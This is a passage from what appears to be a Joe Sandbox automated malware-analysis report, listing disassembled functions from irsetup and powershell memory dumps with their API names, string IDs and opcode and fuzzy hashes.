                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
                                                                                                                    • Instruction ID: 222b8468457cde4f875127d20ef24c91f9358582f200ea179a318cfe432f40bb
                                                                                                                    • Opcode Fuzzy Hash: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
                                                                                                                    • Instruction Fuzzy Hash: 54012B72625A8C41FB975FA9C8513FD275197997E5F92C302FA2E063E2CF3C42088701
                                                                                                                    Function 0000000180028434 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 3432092939-1885708031
                                                                                                                    • Opcode ID: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
                                                                                                                    • Instruction ID: a15908a98ec50fe91217ef7d26e318360d1aa3a5f1900967077516d825dfa4f5
                                                                                                                    • Opcode Fuzzy Hash: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
                                                                                                                    • Instruction Fuzzy Hash: B5518236206BD885E7A38F15E4403EEBBA0F789B94F548111EB8953B55CE39C949DB01
                                                                                                                    Function 00000001800265D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3432092939-2547889144
                                                                                                                    • Opcode ID: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
                                                                                                                    • Instruction ID: 18eb19642d1af780b867c0ab745fc5cb88b23faebf2bc774daddc210fbea8dfb
                                                                                                                    • Opcode Fuzzy Hash: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
                                                                                                                    • Instruction Fuzzy Hash: 5941D672904B8881E7A38B25E4543EA77A0F75ABD5F15C222FB9807BE4CF38C659C700
                                                                                                                    Function 000000018001EA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getbuf
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 606515832-2766056989
                                                                                                                    • Opcode ID: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
                                                                                                                    • Instruction ID: 3d19db322e9b86e5fe25d9977a452369542916dbcc5a558c71ed9a950448e357
                                                                                                                    • Opcode Fuzzy Hash: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
                                                                                                                    • Instruction Fuzzy Hash: 8A31EA72604ECC41EBE78F28D4953AD2691A75ABECF58C206FE1A062D5CF78CA59C341
                                                                                                                    Function 000000018001EEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2310398763-2766056989
                                                                                                                    • Opcode ID: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
                                                                                                                    • Instruction ID: a84850765988291fd4f17f9da1824d97baa36799c8467e6cf5b96115ea6561ae
                                                                                                                    • Opcode Fuzzy Hash: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
                                                                                                                    • Instruction Fuzzy Hash: A9310D32600E8D41EBE7DB3998513FD225167897E4F64C32BFE29466D5DF38C61A8301
                                                                                                                    Function 0000000180039178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: 1
                                                                                                                    • API String ID: 2918714741-2212294583
                                                                                                                    • Opcode ID: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
                                                                                                                    • Instruction ID: 9d0cc6883bf45aa8de4f31950166c67cd5585dda591aea29b30f3553ffaa3b73
                                                                                                                    • Opcode Fuzzy Hash: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
                                                                                                                    • Instruction Fuzzy Hash: 7E21F83261AAC855FBE79B68C4143EF7B91A74E7C0F5AC411B745062C3DE6D8B08C711
                                                                                                                    Function 000000018000DD40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: __close$file is already closed
                                                                                                                    • API String ID: 2918714741-3567927775
                                                                                                                    • Opcode ID: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
                                                                                                                    • Instruction ID: 5212b77ea421d767a63583ebfe1c0c3f01a91f7c6577d08a4d905ae789f47158
                                                                                                                    • Opcode Fuzzy Hash: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
                                                                                                                    • Instruction Fuzzy Hash: 2F21C531710A8981FAD6EB66A8013DE7341ABCDBD0F58D132BD1A0B3DADE38C6498740
                                                                                                                    Function 000000018000D4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: %s: %s$FILE*
                                                                                                                    • API String ID: 2918714741-2400621551
                                                                                                                    • Opcode ID: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
                                                                                                                    • Instruction ID: accc405d7271c740622e845d5831acabee4d184a8a30b13b1a844166888f6864
                                                                                                                    • Opcode Fuzzy Hash: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
                                                                                                                    • Instruction Fuzzy Hash: DF218131315B8885FA92EB22A8517DA3364AB8DBC0F44C122BD490B797DF38C60E8741
                                                                                                                    Function 000000018000D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: %s: %s$FILE*
                                                                                                                    • API String ID: 2918714741-2400621551
                                                                                                                    • Opcode ID: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
                                                                                                                    • Instruction ID: 19c1d6e09956a2abd958a59b08d8592876308c72a2221f84d39e5e547afbcd58
                                                                                                                    • Opcode Fuzzy Hash: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
                                                                                                                    • Instruction Fuzzy Hash: 7E218E31315B8885FAD2EB22A4517DA3354AB8ABC0F54C122BE490BB97DF39C60E8740
                                                                                                                    Function 000000018000E120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: FILE*$attempt to use a closed file
                                                                                                                    • API String ID: 2918714741-999929173
                                                                                                                    • Opcode ID: 5259589b0467af2d185911a9903d098e28697e51fc9d53b68a05c68ec9195d46
                                                                                                                    • Instruction ID: 7b7e7c093c51c25460a7f581b25aced5a49adda45f43c14ec949f41a6986b770
                                                                                                                    • Opcode Fuzzy Hash: 5259589b0467af2d185911a9903d098e28697e51fc9d53b68a05c68ec9195d46
                                                                                                                    • Instruction Fuzzy Hash: 59218471714A5881FB82EB52E4913EE7355E78DBC4F44C021FA0917B96DF38C74A8740
                                                                                                                    Function 000000018000E210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnofflush
                                                                                                                    • String ID: standard %s file is closed
                                                                                                                    • API String ID: 748766958-758085179
                                                                                                                    • Opcode ID: 29d758137d5008e39d38fda35e1e1e78585e31ee197041ab0c03b638ba806f95
                                                                                                                    • Instruction ID: 13b2d2a399c7b8f71d922a7862b0f845e15a3ca73828d8b66483604ea9ce396f
                                                                                                                    • Opcode Fuzzy Hash: 29d758137d5008e39d38fda35e1e1e78585e31ee197041ab0c03b638ba806f95
                                                                                                                    • Instruction Fuzzy Hash: 4311C631704A8881FA86EB66A5913EE7715AB8EBC0F08C121FE591B7D7DF6CC6498340
                                                                                                                    Function 000000018000D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnotmpfile
                                                                                                                    • String ID: FILE*
                                                                                                                    • API String ID: 2695038999-3635956593
                                                                                                                    • Opcode ID: ce56237579ba7b5fc4d47723feea7fa221da64eeb4222d57e2e52a3656d6d57a
                                                                                                                    • Instruction ID: 1b87e2a47b0caa9bcb15d0c74ebd5b5e3093075645f81d52ea40adcb6654f6e9
                                                                                                                    • Opcode Fuzzy Hash: ce56237579ba7b5fc4d47723feea7fa221da64eeb4222d57e2e52a3656d6d57a
                                                                                                                    • Instruction Fuzzy Hash: D7018F30714B8881FE87EB65A6513EE6255AB8DBC0F44C021BA590B7DBDE38C6498340
                                                                                                                    Function 0000000180036434 Relevance: 5.1, APIs: 4, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 7e0a5bc743fb9d37d501aabda031774fcab82c90613f7b52538d4084e900e001
                                                                                                                    • Instruction ID: d99d01bba0891e8888520de705d4049579435edc9586fcbbb3366244542ad5ac
                                                                                                                    • Opcode Fuzzy Hash: 7e0a5bc743fb9d37d501aabda031774fcab82c90613f7b52538d4084e900e001
                                                                                                                    • Instruction Fuzzy Hash: 71517032605A8886EBE39F16A4503EAB7A0B34CBD4F55C535FB9A47795CF38C64A8700

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF8488B7506 Relevance: .5, Instructions: 534COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2212709916.00007FF8488B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_7ff8488b0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 128663ce45ae7cc4be152534f226ede43813cf1d9654c323f4edfb251d853204
                                                                                                                    • Instruction ID: 66656932f1547794695906564f77d113a07be425097f9e5a4de0aeb2b5a90796
                                                                                                                    • Opcode Fuzzy Hash: 128663ce45ae7cc4be152534f226ede43813cf1d9654c323f4edfb251d853204
                                                                                                                    • Instruction Fuzzy Hash: 27027530A1CA8E8FEBA4EF28C8557E937D1FFA5350F04427AE84DC7291DB34A9458B45
                                                                                                                    Function 00007FF8488B82B2 Relevance: .5, Instructions: 512COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2212709916.00007FF8488B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_7ff8488b0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 666024375e80527ae86cd121b3cd35c67c156a3ef1f3cb96376bb239c6755a32
                                                                                                                    • Instruction ID: 2a33349a505cfb54ec3a25f6d99d33cd0e32c3e0dc8d243f40220ef46b0606b5
                                                                                                                    • Opcode Fuzzy Hash: 666024375e80527ae86cd121b3cd35c67c156a3ef1f3cb96376bb239c6755a32
                                                                                                                    • Instruction Fuzzy Hash: 38028430A0CA4E8FEBA8EF28C8557E937D1FF94350F04427AE84DC7291DB74A9458B85
                                                                                                                    Function 00007FF8488B7EC6 Relevance: .4, Instructions: 367COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2212709916.00007FF8488B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_7ff8488b0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 10cd950fb94e9bc22bc03746d99c421e571030b068844deab9d730e1bf5a197c
                                                                                                                    • Instruction ID: 9b0799173db7ffb2fac88b0424965abad648d3828996c5aa094ce3c033eb5718
                                                                                                                    • Opcode Fuzzy Hash: 10cd950fb94e9bc22bc03746d99c421e571030b068844deab9d730e1bf5a197c
                                                                                                                    • Instruction Fuzzy Hash: 36C1963060CA4D4FEB68EF28D8557E93BD1FF65390F04427AE84DC7292DB34A9458B86
                                                                                                                    Function 00007FF8488B79C4 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2212709916.00007FF8488B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_7ff8488b0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28f648773df4eeb2d879417cbf83589235ae3e09064aae078aa6b33d194d6d78
                                                                                                                    • Instruction ID: b308e88586e2380588a3a703bdb8885961b63210f2f2e8c2201cf5dc1e43b6dc
                                                                                                                    • Opcode Fuzzy Hash: 28f648773df4eeb2d879417cbf83589235ae3e09064aae078aa6b33d194d6d78
                                                                                                                    • Instruction Fuzzy Hash: C3310730A1D68E8FFBB4BE14CD0ABF93290FF92354F405139E44D86092CB386A85CB15
                                                                                                                    Function 00007FF8488B3475 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2212709916.00007FF8488B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8488B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_7ff8488b0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                    • Instruction ID: d7fa4fd1ca648b2e597cbba2fd02184718b9bcdc7e8b7a5afc3bc224900fd420
                                                                                                                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                    • Instruction Fuzzy Hash: B201677115CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3695D736E881CB45

                                                                                                                    Executed Functions

                                                                                                                    Function 04A829F0 Relevance: .2, Instructions: 208COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c4359ad21faa0cb9cbb7f6d35882e0b7f1e714950b5d63ac51b33a0781bccfb
                                                                                                                    • Instruction ID: 36e481bf4fe29e21ce05915c38960592ac20c75f9a034190540cdf11cd859ccb
                                                                                                                    • Opcode Fuzzy Hash: 9c4359ad21faa0cb9cbb7f6d35882e0b7f1e714950b5d63ac51b33a0781bccfb
                                                                                                                    • Instruction Fuzzy Hash: 11918D75A002058FCB15DF99C494ABEFBB1FF88310B288599D855AB3A5C735FC51CBA0
                                                                                                                    Function 04A88620 Relevance: .2, Instructions: 196COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cb8429b06dee775cd7f526e274717fbbd0d0796588866d3183731fc85670acd
                                                                                                                    • Instruction ID: d0dd3c98d5dd6b76cf8935b01f1054e5ca9d24068b1552147fabffb5951e3929
                                                                                                                    • Opcode Fuzzy Hash: 2cb8429b06dee775cd7f526e274717fbbd0d0796588866d3183731fc85670acd
                                                                                                                    • Instruction Fuzzy Hash: CE719470A052558FDB15DF69C894B9EBBB1FF85304F0485EAD048AB3A2DB34AD85CF90
                                                                                                                    Function 04A8795E Relevance: .2, Instructions: 188COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 618ebb101b61c13a49d1a87b44cb13d6db88c6f38262f026ce9c3eedfe04bda3
                                                                                                                    • Instruction ID: 581fa70472bf08f7a3dfe6c89a33cb65a816b8913d6105c85825a3c3cbd4d765
                                                                                                                    • Opcode Fuzzy Hash: 618ebb101b61c13a49d1a87b44cb13d6db88c6f38262f026ce9c3eedfe04bda3
                                                                                                                    • Instruction Fuzzy Hash: B2713C74E00218DFDB15EFB5D984AADBBB2FF88344F248529D412AB260DB35AD85CF40
                                                                                                                    Function 04A87CD8 Relevance: .2, Instructions: 167COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
